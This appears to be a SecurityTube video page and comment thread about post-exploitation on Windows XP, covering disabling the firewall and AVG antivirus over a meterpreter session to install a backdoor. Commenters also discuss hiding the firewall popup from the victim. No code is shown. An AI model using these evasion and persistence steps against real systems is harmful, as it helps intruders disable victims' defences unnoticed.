Follow us
Post Exploitation On Windows Xp (Disable Firewall And Avg)
Description: How to deactivate windows firewall ant AV software.
Tags: Post Exploitation Windows XP metasploit firewall AVG ,
Latest from the SecurityTube Blog:
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Original Source: http://www.youtube.com/watch?v=8MFM2b38xGQ
Comments (4):
Login to post a comment
Video Posted By
ST Course Videos
-
Hack Of The Day: Customizing Shellcode For Fun And Profit
-
Hack Of The Day: How Do I Run Untrusted Shellcode?
-
Securitytube Linux Assembly Expert Exam Format
-
[Slae] Writing An Custom Insertion Encoder
-
[Slae] Execve Shellcode Stack Method
-
[Slae] Shellcoding Basics
-
[Slae] Using Libc And Nasm
-
[Slae] Hello World In Assembly Language
-
[Slae] What Is Assembly Language?
-
Securitytube Linux Assembly Expert (Slae) Course Introduction
-
Dumping Class Information In Ios Applications Using Class-Dump-Z
-
Setting Up Sogeti's Data Protection Tools On Ios
-
Creating A Remote Root Shell Using Bash And Launchd On Ios 6.0.1
-
Monitoring Strcpy With Bphook In The Immunity Debugger
-
Securitytube Gnu Debugger Expert: Part 14: Gdb On 64 Bit Systems
-
Securitytube Gnu Debugger Expert: Part 13: Iphone Application Reversing And Cracking With Gdb
-
Securitytube Gnu Debugger Expert: Part 12: Cracking A Simple Program On Arm Architectures
-
Securitytube Gnu Debugger Expert: Part 11: Setting Up Debian Armel In Qemu
-
Securitytube Gnu Debugger Expert: Part 10: Conditional Breakpoints Using Variables And Registers
-
Securitytube Gnu Debugger Expert - Part 9: Disassembling And Cracking A Simple Binary
Nice. It's a pity that you had to simulate the victim accepting the certificate a number of times though. I can understand their clicking once or *maybe* twice, but I would have thought they would become suspicious on the third or subsequent occasion!
I also saw that, when you disabled WFW, there was a popup on the victim's screen. I'm fairly sure I've seen a trick recently (it may have been here on ST) where the popup was disabled so, when the WFW was disabled via the netsh ... command, there was no indication of anything strange happening. I'll see if I can find the clip, unless someone else beats me to it!
Hey Ignatius:
At first thank you for your comment. I´m always interested in constructive criticism :)
@topic:
Yes you are right, in this case the victim at least have to click or use the java applet 2 times... the first time is needed to get a meterpreter session to deactivate the AVG services, so they do not restart when the computer reboots... I´m poorly not able to shut down the running AVG processes/services because they are locked. thatswhy I had to reboot the system... The disadvantage is that (as you already said) we have to gain a new meterpreter session on the victims machine to install the backdoor after the AVG is disabled. In a real world example it should be more practicable... But this wasn´t the topic of the video. The topic was to deactivate the firewall and AVG. The owning of the system and getting a meterpreter session was only a means to an end in this video.
Nevertheless if you know a more practicable way, than show me :)
It would be great if you can show me a video or other instruction how to deactivate the firewall via netsh without the suspicious popup of the WFW :)
Thanks for your reply again!
Greets,
3lL060
I found the video by zerocool394 and here's the link: http://www.securitytube.net/video/2696
He demonstrated a .rb script that did the business on Windows XP and he mentioned that it's more complicated in Vista and Windows 7. I know he's doing a series dealing with SET and he may wait until he's completed that series before posting a more advanced video which explains how to disable the popup on Vista and Windows 7.
Thank you Ignatius :)